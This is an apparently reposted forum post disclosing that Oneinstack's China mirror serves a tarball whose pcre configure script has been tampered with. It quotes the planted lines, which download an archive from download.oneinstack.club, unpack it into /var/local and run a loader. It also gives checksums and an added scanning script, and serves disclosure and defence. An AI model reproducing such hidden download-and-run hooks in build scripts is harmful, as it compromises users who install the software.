
Oneinstack's mainland China download source has also had malicious code planted in it

 8 months ago
source link: https://www.v2ex.com/t/979226


  imhx233 · 13 hours 33 minutes ago · 2096 views

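(No such problem has been found so far when downloading from overseas nodes.)

mirrors.oneinstack.com is a CNAME to seo-one-01.xnsksstack.com. This domain's DNS is on DNSPod: inside China it resolves to CNAME mirrors.oneinstack.com.w.cdngslb.com. (Alibaba Cloud CDN, contains the malicious code), and overseas it resolves to A 47.251.13.6 (a single Alibaba Cloud node in the US).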

# On a machine in China, or after manually pointing to a China IP of mirrors.oneinstack.com.w.cdngslb.com

wget http://mirrors.oneinstack.com/oneinstack-full.tar.gz
tar -xzf oneinstack-full.tar.gz
cd oneinstack/src
tar -xzf pcre-8.45.tar.gz
# Run from oneinstack/src so the relative path pcre-8.45 resolves
grep -r "oneinstack.club" pcre-8.45

Result (line 6883 of pcre-8.45/configure):

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

Verify the MD5:

# Malicious package
md5sum oneinstack-full.tar.gz
3dc788dd9fe0c13e3db1411e53932331  oneinstack-full.tar.gz

# Package from the overseas node (no such problem found so far)
aa55626f6ba9eb8cae2f5a3d9c6c9b96  oneinstack-full.tar.gz

Comparison of the China and overseas packages (overseas on the right, China on the left):

[Screenshots: 714253106.png, 3337536641.png]

Addendum 1  ·  12 hours 49 minutes ago

root@Huangxins-PC:~/oneinstack/src# grep -r '/var/local/' ~/oneinstack/
/root/oneinstack/src/pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null
/root/oneinstack/src/pcre-8.45/configure:rm -f /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:/var/local/cron/load linhkkngf@QWE

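This is the same as the lnmp.org compromise and the Oneinstack compromise of half a year ago (GitHub).

The malicious domain oneinstack.club was registered on 2023-08-28; its registration date and registrar are both the same as those of lnmp's malicious domain lnmp.life.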
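
The manual unpack-and-grep check from the post, generalized as an added example (not the poster's code or Oneinstack's): it unpacks every tarball in a source directory into a throwaway directory and flags `configure` lines that run wget/curl or reference /var/local. The function name `scan_tarballs` and the match pattern are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post): look inside every *.tar.gz in a
# directory and flag `configure` lines that run a downloader or touch /var/local.
# Usage after sourcing this file: scan_tarballs ~/oneinstack/src

# wget/curl in command position, or the drop path quoted in the post.
# This heuristic is an assumption of the example; every hit needs manual review.
SUSPICIOUS_RE='(^|[;&|])[[:space:]]*(wget|curl)[[:space:]]|/var/local/'

# scan_tarballs DIR
# Prints "archive: path:line-number:text" for each hit.
# Returns 0 if nothing was flagged, 1 if something was, 2 on setup failure.
scan_tarballs() {
    src_dir=$1
    flagged=0
    for archive in "$src_dir"/*.tar.gz; do
        [ -f "$archive" ] || continue
        name=$(basename "$archive")
        work=$(mktemp -d) || return 2
        # Extract into a throwaway directory; nothing from the archive is executed.
        if tar -xzf "$archive" -C "$work" 2>/dev/null; then
            hits=$(find "$work" -type f -name configure \
                       -exec grep -EnH "$SUSPICIOUS_RE" {} + | sed "s|^$work/||")
            if [ -n "$hits" ]; then
                flagged=1
                printf '%s\n' "$hits" | while IFS= read -r line; do
                    printf '%s: %s\n' "$name" "$line"
                done
            fi
        else
            echo "warning: could not extract $archive" >&2
        fi
        rm -rf "$work"
    done
    return "$flagged"
}
```

A clean result only means no `configure` script matched the pattern; comparing the archive checksum against a copy fetched over a different network path, as the post does, remains the stronger check.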

